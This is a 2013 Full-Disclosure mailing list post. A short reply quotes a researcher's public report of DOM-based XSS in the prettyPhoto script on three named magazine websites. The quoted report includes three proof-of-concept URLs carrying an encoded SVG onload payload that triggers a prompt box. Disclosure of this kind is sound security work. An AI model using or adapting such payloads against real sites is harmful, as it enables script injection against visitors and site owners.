[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] Pentest Mag, Data Recovery Magazine, and Software Developer's Journal Vulnerab
From: silence_is_best () hushmail ! com
Date: 2013-09-29 14:27:41
Message-ID: 20130929142741.8ED37C04A7 () smtp ! hushmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
LoL...$180 a year...sham.
On 09/29/2013 at 8:13 AM, "Jay Turla" wrote:I have been annoyed
lately by the staffs of Pentest Magazine because of their spam
promotions and "Would you write for Us" inquiries despite saying no to
their proposals. I don't like to write for them because they don't
offer their services for free (Also they sell their magazines to other
people yet they don't pay their writers - no just compensation ). So
here is my full disclosure of Pentest Magazine, Data Recovery
Magazine, and Software Developer's Journal which are all from the same
company or somehow related. The official websites of the magazines
mentioned are all vulnerable to DOM XSS because of the prettyPhoto js.
PoC:http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
Attached are my screenshots.
P.S. No harmed was done!
[Attachment #5 (unknown)]
<span style="font-family: Arial; font-size: 13px;">LoL...$180 a year...sham.<br><br>On \
09/29/2013 at 8:13 AM, "Jay Turla" <shipcodez@gmail.com> wrote:<blockquote \
style="border-left:solid 1px #ccc;margin-left:10px;padding-left:10px;"><div dir="ltr">I have \
been annoyed lately by the staffs of Pentest Magazine because of their spam promotions and \
"Would you write for Us" inquiries despite saying no to their proposals. I don't like to write \
for them because they don't offer their services for free (Also they sell their magazines to \
other people yet they don't pay their writers - no just compensation ). So here is my full \
disclosure of Pentest Magazine, Data Recovery Magazine, and Software Developer's Journal \
which are all from the same company or somehow related. The official websites of the magazines \
mentioned are all vulnerable to DOM XSS because of the prettyPhoto js.<div> <br></div><div \
style="">PoC:</div><div style=""><a target="_blank" \
href="http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/" \
onclick="window.open('http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/');return \
false;">http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/</a><br>
</div><div style=""><br></div><div style=""><a target="_blank" \
href="http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/" \
onclick="window.open('http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/');return \
false;">http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/</a><br>
</div><div style=""><br></div><div style=""><a target="_blank" \
href="http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/" \
onclick="window.open('http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/');return \
false;">http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/</a><br>
</div><div style=""><br></div><div style="">Attached are my screenshots. </div><div \
style=""><br></div><div style="">P.S. No harmed was done!</div></div></blockquote></span>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic